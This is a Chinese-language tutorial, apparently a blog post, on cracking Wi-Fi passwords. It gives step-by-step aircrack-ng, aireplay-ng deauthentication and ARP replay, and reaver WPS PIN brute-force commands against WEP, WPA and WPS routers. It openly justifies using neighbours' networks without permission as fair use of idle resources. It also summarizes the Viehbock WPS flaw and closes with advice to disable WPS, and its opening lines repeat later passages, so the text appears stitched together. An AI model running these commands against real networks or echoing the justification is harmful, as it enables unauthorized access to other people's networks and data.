wi-fi无线破解过程与原理简要介绍

用aircrack-ng加载一个字典,用这个字典跑出明文密码,若密码不在字典中,破解将各失败。
WPS破解(pin破)过程:
reaver -i mon0 -b 40:16:xx:xx:xx:xx -a -S -s 4016xxxxxxxx.wpc -v
pin破原理也很简单,就是枚举所有pin值。但由于受制于无线路由器的硬件(内存、CPU),pin破的过程很可能非常缓慢。但由于pin值的确定性,这种破解方式获得密码的概率要高于WPA方式。




3种方式对比:


1. 若是WEP加密,毫无悬念,没什么破解的阻力。
破解难易程度:★

2. 若有WPS连接方式,只要功夫深,铁杵磨成针,最终还是能得到密码的。
破解难易程度:★★

3. 若是WPA加密,那就看运气了,抓包,跑字典,1234什么的密码就是撞大运了。
破解难易程度:★★★



虽说蹭网不是什么光彩的事,但如果一些网络资源没有使用而闲置着,利用起来也不是什么坏事。在中国目前这样的大环境下,只要遵守一定的道德底线,蹭网也算是社会资源的充分利用吧。


一些wi-fi破解论坛里教程什么的都很详尽,卖的所谓的“蹭网卡”的说明书也是step by step的,图文并茂,通俗易懂。其实他们都是在说,安装一个虚拟机,挂载含有破解程序的光盘镜像,启动起来虚拟机并运行其中的破解程序。个中过程,下面细细说来。




wi-fi信号是一种无线电,频率是2.4GHz,这相当于调频收音机最高频点(108MHz)的22倍,受其高频率的局限,其覆盖范围远没有调频广播的覆盖范围大,正常功率、日常环境下也就在100米之内。在半径100米的城市环境里,随着各种wi-fi设备的增加,总能搜索到一两个信号,下图是我在某地的搜索结果:
 


除CMCC等运营商的wi-fi外,其它都是加密的。加密方式分两种,一种是WEP,一种是WPA/WPA2。WEP加密是一种比较原始的加密方式,由于其自身的设计上的漏洞,只要信号强度足够,在1小时之内就能被完全破解,而破解的方式也有好几种,并能在无客户端连接的情况下注入破解。现在出售的无线路由器仍保留WEP加密方式的选项,很可能只是惯例,建议大家不要再使用这种加密方式。WPA加密是目前主流的加密方式,在无客户端并且关闭WPS等连接方式时,只要密码强度足够,被破解的概率还是很低的。




目前的wi-fi破解核心工具有两个,aircrack-ng与reaver-wps,前者是wi-fi破解工具的一个集合,上面说到的WEP与WPA加密方式的破解由它来实现,后者是WPS破解方式的(pin破)实现。下面用实例说明:




WEP破解过程:

airodump-ng mon0
airmon-ng用来虚拟一个无线网卡,这样可以将一张无线网卡同时做不同的用途。
airodump-ng –ivs –channel 9 –bssid 1C:7E:E5:xx:xx:xx -w aprcapture mon0




airodump 抓取指定的bssid AP的数据包,并保存在一个文件里。
aireplay-ng -3 -b 1C:7E:E5:xx:xx:xx -h 0C:60:76:xx:xx:xx mon0




这行命令是在airodump执行的同时执行,它以模式“3”(ARP请求代理)从源MAC地址向目的MAC地址发送ARP请求。目的就是获得AP返回的ARP响应。
aircrack-ng aprcapture-01.ivs
aircrack-ng分析捕获的ivs数据包,分析出密码。




WPA破解过程:

airodump-ng -c 9 –bssid xx:xx:xx:xx:xx:xx -w psk mon0
同样,需要airodump-ng抓包
aireplay-ng -0 1 -a F4:EC:xx:xx:xx:xx -c 5C:AC:xx:xx:xx:xx mon0


用aireplay的“0”模式(攻击模式,模拟目标客户端向AP发送重连请求,从而会使目标客户端断开连接),借以捕获握手包。
aircrack-ng -w pswd.dict -b xx:xx:xx:xx:xx:xx psk*.cap
用aircrack-ng加载一个字典,用这个字典跑出明文密码,若密码不在字典中,破解将各失败。




WPS破解(pin破)过程:

reaver -i mon0 -b 40:16:xx:xx:xx:xx -a -S -s 4016xxxxxxxx.wpc -v
pin破原理也很简单,就是枚举所有pin值。但由于受制于无线路由器的硬件(内存、CPU),pin破的过程很可能非常缓慢。但由于pin值的确定性,这种破解方式获得密码的概率要高于WPA方式。

关于PIN码破解原理官方资料
 

各位应该有注意到现在市面上的 Wi-Fi 路由器,出厂时其实便已预设启用 WPS 的加密保护,而这样的「好意」原本也算是相当安全的做法。但在信息安全专家 Stefan Viehbock 的研究中,发现此加密技术其实存在着十分重大的安全漏洞。他平均只需要两小时左右,便能以不断尝试密码组合的暴力(Brute Force)攻击,破解 WPS 密码保护的路由器。


     这样看似蛮横的破解方式,关键在于利用 Viehbock 所找出的此技术的设计缺陷后,这个八码的 WPS 加密技术溃堤的速度将超乎想象。

     采用 WPS 加密技术的 Wi-Fi 路由器,原在用户的每次密码尝试时,会分成「前半」四码和「后半」四码。前四码如果错误的话,那路由器就会直接送出「错误」讯息,而不会继续看后四码,意味着试到正确的前四码,最多只需要试 10000 组号码。一旦没有错误讯息,就表示前四码是正确的,而我们便可以开始尝试后四码 -- 后四码比前四码还要简单,因为八码中的最后一码是检查码,由前面七个数字产生,因此实际上要试的只有三个数字,共一千个组合。这使得原本最高应该可达一千万组的密码组合(七位数+检查码),瞬间缩减到仅剩 11,000 组,大幅降低破解所需的时间。


     虽然也有部分路由器机种具备封锁(Lock Down)机制来避免类似的攻击,但可惜的是,这样的机制仍不足以及时阻止攻击的发生。(不过还是有让破解变得更为耗时啦!但完成破解的平均时间还是低于一天...)



美国计算机紧急应变团队(US-CERT)也针对这位资安专家的发现提出警告,建议拥有 Wi-Fi 无线路由器的用户,可以关闭产品的 WPS 加密选项先改采其他加密选项。Viehbock 也整理了出厂时便将 WPS 默认开启的品牌清单,知名厂牌 Buffalo、D-Link、Linksys 与 Netgear 等也都包含其中。目前为止各厂牌也尚未针对此问题释出韧体更新(也就是即使您用的是最新的韧体,目前也无法阻挡此类攻击),对此,Viehbock 也承诺将在未来释出此破解工具供参考,来协助厂商解决这样的加密技术问题。引用来源可以观看更详尽的相关数据。总之,大家还是赶快照专家建议的改用别种加密方式吧!(个人使用的话最好还锁是个 MAC 码之类的吧~)